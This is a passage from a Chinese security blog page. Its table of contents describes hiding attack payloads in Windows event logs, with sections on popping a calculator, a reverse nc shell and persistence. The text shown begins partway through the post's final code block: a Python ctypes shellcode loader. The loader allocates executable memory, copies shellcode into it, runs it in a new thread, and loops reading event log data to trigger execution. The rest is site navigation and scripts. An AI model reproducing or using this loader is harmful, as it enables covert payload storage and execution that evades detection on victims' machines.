class="params">shellcode</span>):</span></span><br><span class="line">    shellcode = <span class="built_in">bytearray</span>(shellcode)</span><br><span class="line">    <span class="built_in">print</span>(shellcode)</span><br><span class="line"></span><br><span class="line">    ctypes .windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64</span><br><span class="line">    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(<span class="number">0</span>), ctypes.c_int(<span class="built_in">len</span>(shellcode)), ctypes.c_int(<span class="number">0x3000</span>), ctypes.c_int(<span class="number">0x40</span>))</span><br><span class="line">    buf = (ctypes.c_char * <span class="built_in">len</span>(shellcode)).from_buffer(shellcode)</span><br><span class="line"></span><br><span class="line">    ctypes.windll.kernel32.RtlMoveMemory(</span><br><span class="line">        ctypes.c_uint64(ptr),</span><br><span class="line">        buf,</span><br><span class="line">        ctypes.c_int(<span class="built_in">len</span>(shellcode))</span><br><span class="line">    )</span><br><span class="line"></span><br><span class="line">    handle = ctypes.windll.kernel32.CreateThread(</span><br><span class="line">        ctypes.c_int(<span class="number">0</span>),</span><br><span class="line">        ctypes.c_int(<span class="number">0</span>),</span><br><span class="line">        ctypes.c_uint64(ptr),</span><br><span class="line">        ctypes.c_int(<span class="number">0</span>),</span><br><span class="line">        ctypes.c_int(<span class="number">0</span>),</span><br><span class="line">        ctypes.pointer(ctypes.c_int(<span class="number">0</span>))</span><br><span class="line">    )</span><br><span class="line"></span><br><span class="line">    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-<span class="number">1</span>))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    events = win32evtlog.ReadEventLog(hand, flags, <span class="number">0</span>)</span><br><span class="line">    <span class="keyword">if</span> events:</span><br><span class="line">        <span class="keyword">for</span> event <span class="keyword">in</span> events:</span><br><span class="line">            <span class="built_in">print</span>(event.Data)</span><br><span class="line">            <span class="keyword">if</span> event.Data:</span><br><span class="line">                switch = calc(event.Data)</span><br><span class="line">    <span class="keyword">if</span> switch:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/03/17/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94-%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4-31-%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E/" rel="prev" title="【漏洞复现】蜂网互联 企业级路由器v4.31 密码泄露漏洞">
      <i class="fa fa-chevron-left"></i> 【漏洞复现】蜂网互联 企业级路由器v4.31 密码泄露漏洞
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/03/21/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91CVE-2021-45232%EF%BC%9AApache-APISIX-Dashboard-RCE/" rel="next" title="【漏洞复现】CVE-2021-45232：Apache APISIX Dashboard RCE">
      【漏洞复现】CVE-2021-45232：Apache APISIX Dashboard RCE <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%B7%A7%E7%94%A8Windows%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97%E9%9A%90%E8%97%8F%E8%BD%BD%E8%8D%B7"><span class="nav-number">1.</span> <span class="nav-text">巧用Windows事件日志隐藏载荷</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%86%99%E5%85%A5%E6%97%A5%E5%BF%97"><span class="nav-number">2.</span> <span class="nav-text">写入日志</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%BC%B9%E8%AE%A1%E7%AE%97%E5%99%A8%E5%A4%8D%E7%8E%B0"><span class="nav-number">3.</span> <span class="nav-text">弹计算器复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%86%99%E5%85%A5%E8%8D%B7%E8%BD%BD"><span class="nav-number">3.1.</span> <span class="nav-text">写入荷载</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%89%A7%E8%A1%8C%E8%8D%B7%E8%BD%BD"><span class="nav-number">3.2.</span> <span class="nav-text">执行荷载</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%8D%E5%BC%B9nc%E5%91%BD%E4%BB%A4"><span class="nav-number">4.</span> <span class="nav-text">反弹nc命令</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B3%A8%E5%85%A5%E5%B9%B6%E6%89%A7%E8%A1%8C%E8%8D%B7%E8%BD%BD"><span class="nav-number">4.1.</span> <span class="nav-text">注入并执行荷载</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%B3%A8%E6%84%8F%E4%BA%8B%E9%A1%B9"><span class="nav-number">5.</span> <span class="nav-text">注意事项</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%94%A8%E6%88%B7%E9%99%90%E5%88%B6"><span class="nav-number">5.1.</span> <span class="nav-text">用户限制</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A4%A7%E5%B0%8F%E9%99%90%E5%88%B6"><span class="nav-number">5.2.</span> <span class="nav-text">大小限制</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9B%B4%E6%8C%81%E4%B9%85"><span class="nav-number">5.3.</span> <span class="nav-text">更持久</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BB%A3%E7%A0%81"><span class="nav-number">6.</span> <span class="nav-text">代码</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="十三"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">十三</p>
  <div class="site-description" itemprop="description">潜心学习，不骄不躁</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">175</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">十三</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"live2d-widget-model-tsumiki"},"display":{"position":"right","width":300,"height":600},"mobile":{"show":true},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>
